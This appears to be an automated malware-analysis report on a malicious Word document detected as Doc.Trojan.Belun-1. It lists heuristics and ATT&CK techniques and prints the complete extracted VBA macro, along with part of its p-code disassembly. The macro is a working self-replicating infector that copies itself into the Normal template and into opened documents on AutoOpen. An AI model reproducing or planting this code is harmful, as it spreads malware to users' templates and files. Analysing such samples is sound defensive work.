MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample is a malicious Office document containing a VBA macro. The macro's AutoOpen subroutine, named 'IstMirSchlecht', attempts to copy itself to the Normal template and the active document, likely to establish persistence or evade detection. The ClamAV detection 'Doc.Trojan.Belun-1' further supports its malicious nature. The macro's logic suggests an attempt to maintain its presence across sessions.
Heuristics 4
-
ClamAV: Doc.Trojan.Belun-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Belun-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9176 bytes |
SHA-256: f92c9e11fe67ed3ae17fe4df01a44d537d39c1dbefb682346022f03062ba84e4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "uebel"
Sub AutoOpen()
IstMirSchlecht
End Sub
Sub IstMirSchlecht()
'On Error Resume Next
Set Norm = NormalTemplate.VBProject.VBComponents
Set Acti = ActiveDocument.VBProject.VBComponents
Const ActiveModulName = "uebel"
For i = 1 To Norm.Count
If Norm(i).Name = ActiveModulName Then NormIns = True
If Norm(i).Name = "Modul1" And NormIns = False Then KillSomeNormModul = True
Next
For i = 1 To Acti.Count
If Acti(i).Name = ActiveModulName Then ActIns = True
If Acti(i).Name = "Modul1" And ActIns = False Then KillSomeActModul = True
Next
If KillSomeNormModul = True Then
Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:="Modul1", Object:=wdOrganizerObjectProjectItems
End If
If KillSomeActModul = True Then
Application.OrganizerDelete Source:=ActiveDocument.FullName, Name:="Modul1", Object:=wdOrganizerObjectProjectItems
End If
If NormIns = False Then
CheckRefNormal
Norm.Add (vbext_ct_StdModule)
Norm("Modul1").Name = ActiveModulName
ActiveLines = ActiveDocument.VBProject.VBComponents(ActiveModulName).CodeModule.CountOfLines
ActContent = ActiveDocument.VBProject.VBComponents(ActiveModulName).CodeModule.Lines(1, ActiveLines)
Norm(ActiveModulName).CodeModule.AddFromString (ActContent)
NormalTemplate.Save
End If
If ActIns = False Then
CheckRefActive
Acti.Add (vbext_ct_StdModule)
Acti("Modul1").Name = ActiveModulName
NormLines = NormalTemplate.VBProject.VBComponents(ActiveModulName).CodeModule.CountOfLines
NormContent = NormalTemplate.VBProject.VBComponents(ActiveModulName).CodeModule.Lines(1, NormLines)
Acti(ActiveModulName).CodeModule.AddFromString (NormContent)
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
End Sub
Function CheckRefNormal()
CheckRefNormal = False
For i = 1 To NormalTemplate.VBProject.References.Count
If NormalTemplate.VBProject.References(i).Name = "VBIDE" Then CheckRefNormal = True
Next
If CheckRefNormal = False Then
NormalTemplate.VBProject.References.AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0
End If
End Function
Function CheckRefActive()
CheckRefActive = False
For i = 1 To ActiveDocument.VBProject.References.Count
If ActiveDocument.VBProject.References(i).Name = "VBIDE" Then CheckRefActive = True
Next
If CheckRefActive = False Then
ActiveDocument.VBProject.References.AddFromGuid "{0002E157-0000-0000-C000-000000000046}", 1, 0
End If
End Function
' Processing file: /opt/analyzer/scan_staging/6347f529b1754315b9a9fde4025c806e.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1586 bytes
' Macros/VBA/uebel - 6220 bytes
' Line #0:
' FuncDefn (Sub AutoOpen())
' Line #1:
' ArgsCall IstMirSchlecht 0x0000
' Line #2:
' EndSub
' Line #3:
' FuncDefn (Sub IstMirSchlecht())
' Line #4:
' QuoteRem 0x0000 0x0014 "On Error Resume Next"
' Line #5:
' SetStmt
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' Set Norm
' Line #6:
' SetStmt
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' Set Acti
' Line #7:
' Dim (Const)
' LitStr 0x0005 "uebel"
' VarDefn ActiveModulName
' Line #8:
' Line #9:
' StartForVariable
' Ld i
' EndForVariable
' LitDI2 0x0001
' Ld Norm
' MemLd Count
' For
' Line #10:
' Ld i
' ArgsLd Norm 0x0001
' MemLd New
' Ld ActiveModulName
' Eq
' If
' BoSImplicit
' LitVarSpecial (True)
' St NormIns
' EndIf
' Line #11:
' Ld i
' ArgsLd Norm 0x0001
' MemLd New
' LitStr 0x0006 "Modul1"
' Eq
' Ld NormIns
' LitVarSpecial (False)
' Eq
' And
' If
' BoSImplicit
' LitVarSpecial (True)
' St KillSomeNormModul
' EndIf
' Line #12:
' StartForVariable
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.